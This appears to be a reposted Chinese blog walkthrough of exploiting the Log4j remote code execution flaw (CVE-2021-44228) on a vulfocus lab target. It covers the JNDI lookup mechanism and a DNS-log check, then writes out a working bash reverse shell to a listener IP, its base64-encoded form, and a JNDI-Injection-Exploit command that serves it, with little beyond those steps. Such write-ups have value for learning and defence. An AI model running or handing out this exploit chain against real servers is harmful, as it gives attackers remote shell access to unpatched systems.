当前位置: 首页 > article >正文

CVE-2021-44228 Apache log4j 远程命令执行漏洞

一、漏洞原理

log4j(log for java)是由Java编写的可靠、灵活的日志框架,是Apache旗下的一个开源项目,使用Log4j,我们更加方便的记录了日志信息,它不但能控制日志输出的目的地,也能控制日志输出的内容格式;通过定义不同的日志级别,可以更加精确的控制日志的生成过程,从而达到我们应用的需求;这一切,都得益于一个灵活的配置文件,并不需要我们更改代码。

由于log4j提供了lookup机制,使日志中的${}也可进行执行,在其中输入JNDI的payload,即可进行执行。

在这里插入图片描述
使用lookup进行jndi注入,通过ldap、rmi等使其访问不安全的服务。
在这里插入图片描述

二、验证漏洞

开启vulfocus的靶场
在这里插入图片描述
进入指定url后点一下连接进行抓包,可以看到这次的输入是get型
在这里插入图片描述
使用开源的dnslog:ceye.io
先url编码
在这里插入图片描述
点击发送,DNSLOG收到了访问请求
在这里插入图片描述

成功验证漏洞存在

三、反弹shell

反弹shell采取如图结构:
在这里插入图片描述
监听机kali: 192.168.92.128
在这里插入图片描述

反弹shell:

bash -i >& /dev/tcp/192.168.92.128/4444 0>&1

由于runtime不会执行管道,所以需要将反弹shell使用base64加密

bash -c "{echo,加密后文本}|{base64,-d}|{bash,-i}"

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDA+JjE=

bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar是jndi注入工具,起到了上述危险服务器的作用。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkyLjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -A "10.88.84.219"

在这里插入图片描述

此处必须复制无版本号的rmi,否则不会成功,理由未知。
在这里插入图片描述


http://www.kler.cn/a/105481.html

相关文章:

  • python爬虫之正则表达式解析实战
  • 定义USB接口,鼠标类和键盘类都可以作为实现类去实现USB接口
  • 第四章 文件管理 七、文件共享
  • [论文阅读]Point Density-Aware Voxels for LiDAR 3D Object Detection(PDV)
  • 【OpenCV实现平滑图像处理】
  • Ps:简单快速的主背分离方法
  • JAVA 短剧系统小程序的开发流程
  • 基于nodejs+vue 宁夏旅游景点客流量数据分析系统
  • 【MySQL】SQL语句优化
  • Qt5 Python-docx库的使用,Qt python混合编程,qt 读写word,不依赖office
  • 代码随想录图论 第三天 | 130. 被围绕的区域 417. 太平洋大西洋水流问题
  • 【JavaSE专栏53】Java集合类HashMap详解
  • 面试总结之消息中间件
  • 几个常用的nosql数据库的操作方式
  • 构建自动化测试环境:使用Docker和Selenium!
  • Spring Boot 使用 Disruptor 做内部高性能消息队列
  • 免登陆 同步脚本 zookeeper kafka集群详细安装步骤
  • node 第十二天 npm补充 详解package-lock.json在团队协作中的作用
  • Java 使用 poi 和 aspose 实现 word 模板数据写入并转换 pdf 增加水印
  • 网络协议--BOOTP:引导程序协议